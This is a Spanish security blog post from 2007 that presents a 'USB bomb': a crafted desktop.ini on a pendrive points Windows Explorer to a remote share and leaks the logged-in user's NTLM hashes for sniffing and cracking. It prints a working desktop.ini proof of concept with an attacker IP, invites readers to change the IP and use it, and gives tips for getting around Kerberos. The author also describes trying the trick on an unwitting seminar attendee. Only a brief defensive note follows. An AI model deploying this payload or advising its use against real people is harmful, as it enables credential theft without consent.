lunes, enero 08, 2007

Bomba USB

Debía al señor Atar hablar un día sobre lo que me enseñó en una sesión, porque se lo merece y porque cuando alguien te enseña algo tan bueno por elegante, simple y funcional, solo dices. ¡Joder! ¡Que cabrón! ¿Cómo no se me ha ocurrido a mí?

El ataque él lo llamó cariñosamente USB Bomb y consiste en algo tan sencillo como esto:

El objetivo es conseguir los hashes de la cuenta que está logada en una máquina. Para ello necesitamos que el usuario pro-activamente quiera conseguir un recurso que esté situado en una máquina remota donde se le exija logarse. Fácil. Vale, ¿qué es lo que hay que hacer? Buscar formas de meter en documentos links a recursos externos que el sistema (cuando digo sistema quiero decir Windows, aunque el ataque es similar, que no igual, en otras plataformas [cuando digo otras plataformas quiero decir Linux]). El amigo Tarasco se ha dedicado a mirar eso, y ha visto como hacer esto en documentos html, .lnk, .url, .ppt, etc… pero el que más me sorprende es el de desktop.ini.

Este ficherito tan bonito carga cosas tan lindas como imágenes para el fondo de las carpetas, para estilos, etc…. Chulo ¿no?. Bueno, pues si pones una ruta que esté en otro equipo, el usuario tendrá que acceder a ella. Bien, lo cojonudo de esto, es que para que este fichero se ejecute no hace falta ni que el usuario entre en la carpeta, basta con pinchar un usb y el proceso Explorer.exe cargará automáticamente el desktop.ini de este pendrive. Basta con que tengas una carpeta compartida en otro ordenador y listo.

Andrés me decía. “Es guay, comparte una carpeta por red, déjalo y todo el mundo te manda tus hashes, pones un sniffer y luego a crackearlo. Pasesas, metes usb, cuentas hasta 5, quitas usb.”

Cierto. ¡Joder que bueno!. Sencillo, elegante y rápido. Así que en el siguiente Security On Site (sesiones que hacemos con los equipos de seguridad e infraestructura por toda España) le pasé un pendrive a un asistente y le dije, eh, ¡me imprimes la encuesta?. Y él, encantado lo hizo. Active mi cain, esperando los hashes, pero no me llegaron! ¿Por qué? Pues pq le había enviado a una ip del dominio y se utilizó el sistema kerberos. Así que nada, cuando hagáis esto, tenéis que hacerlo, enviando a una máquina fuera del dominio, y si lo hacéis con una máquina de dentro hacerlo con la opción que traen las últimas versiones de Cain para hacer una degradación de Kerberos a NTLM.

Si queréis probarlo, este es el archivo desktop.ini que uso yo, cambiad la ip y listo.

[.ShellClassInfo]
InfoTip=Proof_Of_Concept_Exploit1
LocalizedResourceName=@\\10.144.34.120\admin$,-1
IconIndex=-666
ConfirmFileOp=0


Este fichero está creado con la herramienta de Andrés Tarasco que tenéis en esta URL:

Named Pipes

Y si queréis ver más de lo que ha hecho Andrés, pues nada, visitad esta URL:

http://www.514.es/

¿Y para proteger?

Bueno, en primer lugar acceso físico a tu a máquina (en el caso del desktop.ini) en los otros análizados por Andrés (.html, .lnk, .ppt) pues navegación segura, aunque estoy con Andrés, ¡joder! Ya no vale navegación segura, sino navegación PARANOICA. Y por último, pues las politicas de pinchar USBs, la gente de ADM Tools y GFI tienen unas herramientas para XP y en Windows Vista viene de serie.

Bies!

No hay comentarios:

Publicar un comentario